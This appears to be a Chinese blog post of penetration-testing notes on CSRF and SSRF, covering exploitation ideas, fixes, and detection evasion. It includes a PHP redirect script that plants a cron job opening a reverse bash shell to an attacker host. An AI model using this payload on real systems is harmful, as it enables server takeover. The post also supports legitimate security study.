本文的預計目标是寫一寫SSRF和CSRF
因為CSRF整體内容較少,是以就混進來了!
CSRF部分
CSRF個人認為比較有威脅的就要數背景頁面CSRF或者XSRF了。
CSRF本身的利用難點應該是如何讓目标同時開啟攻擊與受害兩個頁面,并且攻擊有效目标。
目前我還沒有用這種方式成功利用過,是以對我來說是處于理論可實作部分。
XSRF危害要大一些,典型的一加一大于二。
可以利用CSRF觸發xss,也可以利用XSS觸發CSRF,利用的有效性較高,互動性小,并且某些情況下可以形成靜默攻擊,也不容易被waf阻攔(前提是xssbypass成功先。)
常見的csrf的驗證與繞過就說對于伺服器是否存在相應驗證進行一個嘗試就好了,是一個相對簡單的漏洞。
由于一般危害也屬于低危,是以需要聯合利用。
CSRF部分就到這裡了,個人關注CSRF并不是很多,是以目前止步于此。
SSRF
ssrf可能是接下來幾年熱門度灰有所提高的一種漏洞,起碼在HW等項目中利用的頻率和危害應當會顯著提高。
原因就是目前衆多企業與集團的建設越發向雲遷移,而雲上若是業務或主機隔離沒有非常完善的話,正常的ssrf會造成嚴重危害,基本上所有的ssrf威脅都會提高一個等級。
之後有時間我會專門做一些關于waf與流量檢測在何種使用頻率下對于ssrf的檢測效率最低,也就說總體流量,報錯率與攻擊頻率隐藏程度的關系,降低我們現在的以高爆發高回複形式的資料擷取帶來的弊端,當然這隻是一個思考方向,因為進行内網探測時候動作比較大,提高危害說主要目的。
首先說修複建議,修複建議主要是亮點,一是将服務的請求接口放置在外網區域并且進行隔斷,防止出現漏洞時候能夠進行跳闆攻擊。
二是建立白名單機制,隻允許對指定的資源進行請求,但是這個和業務相關,不一定可以采納。
三是最底層建議就是将利用協定全部屏蔽,但是黑名單機制永遠存在風險,這是問題點。
查找方式就是找到進行資源請求的點,然後将其資源請求的目标換成一個可控目标,确定其是否存在漏洞,然後針對性進行協定檢測,得到是否可以進一步利用。
進一步利用之後,就是getshell,這個和開放的協定有關。
再之後便是内網漫遊.jpg
如果不是多種漏洞結合的情況,正常的步驟是固定的,一般會搭配302跳轉,建議自建伺服器進行測試,可以有效提高檢測效率。
當然前提是外網勘測。
也可以利用dnslog。
以下是常用的固定腳本。
302頁面
<?php
$ip = $_GET['ip'];
$port = $_GET['port'];
$bhost = $_GET['bhost'];
$bport = $_GET['bport'];
$scheme = $_GET['s'];
header("Location: $scheme://$ip:$port/set:0:\"\\x0a\\x0a*/1\\x20*\\x20*\\x20*\\x20*\\x20/bin/bash\\x20-i\\x20>\\x26\\x20/dev/tcp/{$bhost}/{$bport}\\x200>\\x261\\x0a\\x0a\\x0a\"");
?>
顯然重點就是改一下header用來改變攻擊點。
腳本先不貼了,腳本分為檢測腳本和利用腳本,多數是不用協定的fuzzing,可以寫一個模闆然後改,但是我本身用工具多一些,自己也沒有寫233,确實寫的也不全。(ssrfmap蠻好用的,可以試試,ssrfx也有被推薦過)
csrf與ssrf屬于偏低危漏洞範疇,但是所有漏洞都有通向getshell的一個台階。